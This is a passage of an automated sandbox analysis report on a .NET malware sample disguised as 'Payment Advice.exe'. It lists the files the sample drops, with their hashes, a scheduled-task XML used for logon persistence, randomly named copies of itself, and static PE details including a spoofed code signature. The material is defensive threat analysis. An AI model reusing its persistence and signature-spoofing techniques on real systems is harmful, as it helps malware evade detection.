                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xbngyaq.g42.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33p3wgzx.dln.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3txy3oys.blp.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fm2dvqgd.hcl.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_keru10gn.pnm.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3xa4heo.qmr.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzxa52gb.ecg.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uklbcpkl.dko.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\tmp6619.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:true
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                    C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                    C:\Users\user\AppData\Local\Temp\tmpA082.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                    C:\Users\user\AppData\Local\Temp\tmpC03F.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):695304
                                                                                    Entropy (8bit):7.966429011761553
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:fH7A3U2WtXkF/gAiCTLY10rcTu0Gm6NHeMdwG+q7Ln2oMIzw4CGDw92kR:UE2OSIUTE14cZ6dp3n2opw/
                                                                                    MD5:F060B9400A263BEA044A7789EC1D85D9
                                                                                    SHA1:3E939EA522E4356FBDC15C7E0119366A6369E0C9
                                                                                    SHA-256:921ACE6C0F27813FA370B65BCAEE79824A4E31920DBDFEC7652103C60E84CD23
                                                                                    SHA-512:CEDA146640E354440FFBDBE3B8DE48E4C1B7B03654687115B1E320F6C38513BFE00CC5BA5AFB5858126BC6A257630980D34FD81F26AE992077330ED30D3A39DA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4O f.................B...".......a... ........@.. ....................................@.................................xa..S........ ...........f...6........................................................... ............... ..H............text....A... ...B.................. ..`.rsrc.... ....... ...D..............@..@.reloc...............d..............@..B.................a......H.......P...(O......A....................................................0..A....... .........%.....(......... .........%.....(.........(%...*.....&*...f.(.....s....}......}....*...0..........~......~.......o....~....%-.&~..........s....%.....(...+o.....+......E........G...........&...;.......;...+.8.....o.....s......o.....o....&...+...o........(....o......o.......+.s.......o.....o......+.+......E....................0...]...........]...........+....=...+...o........o+...s8...

                                                                                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):695304
                                                                                    Entropy (8bit):7.966429011761553
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:fH7A3U2WtXkF/gAiCTLY10rcTu0Gm6NHeMdwG+q7Ln2oMIzw4CGDw92kR:UE2OSIUTE14cZ6dp3n2opw/
                                                                                    MD5:F060B9400A263BEA044A7789EC1D85D9
                                                                                    SHA1:3E939EA522E4356FBDC15C7E0119366A6369E0C9
                                                                                    SHA-256:921ACE6C0F27813FA370B65BCAEE79824A4E31920DBDFEC7652103C60E84CD23
                                                                                    SHA-512:CEDA146640E354440FFBDBE3B8DE48E4C1B7B03654687115B1E320F6C38513BFE00CC5BA5AFB5858126BC6A257630980D34FD81F26AE992077330ED30D3A39DA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4O f.................B...".......a... ........@.. ....................................@.................................xa..S........ ...........f...6........................................................... ............... ..H............text....A... ...B.................. ..`.rsrc.... ....... ...D..............@..@.reloc...............d..............@..B.................a......H.......P...(O......A....................................................0..A....... .........%.....(......... .........%.....(.........(%...*.....&*...f.(.....s....}......}....*...0..........~......~.......o....~....%-.&~..........s....%.....(...+o.....+......E........G...........&...;.......;...+.8.....o.....s......o.....o....&...+...o........(....o......o.......+.s.......o.....o......+.+......E....................0...]...........]...........+....=...+...o........o+...s8...

                                                                                    C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.966429011761553
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Payment Advice.exe
                                                                                    File size:695'304 bytes
                                                                                    MD5:f060b9400a263bea044a7789ec1d85d9
                                                                                    SHA1:3e939ea522e4356fbdc15c7e0119366a6369e0c9
                                                                                    SHA256:921ace6c0f27813fa370b65bcaee79824a4e31920dbdfec7652103c60e84cd23
                                                                                    SHA512:ceda146640e354440ffbdbe3b8de48e4c1b7b03654687115b1e320f6c38513bfe00cc5ba5afb5858126bc6a257630980d34fd81f26ae992077330ed30d3a39da
                                                                                    SSDEEP:12288:fH7A3U2WtXkF/gAiCTLY10rcTu0Gm6NHeMdwG+q7Ln2oMIzw4CGDw92kR:UE2OSIUTE14cZ6dp3n2opw/
                                                                                    TLSH:94E423C5B2B4DB33C38D4D70A163860C2772D9C67611E7FE259A85BB2BF2B2055A0D63
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4O f.................B...".......a... ........@.. ....................................@................................

                                                                                    File Icon

                                                                                    Icon Hash:0f235999b9792317

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4a61ce
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x66204F34 [Wed Apr 17 22:37:40 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa61780x53.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x2000.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
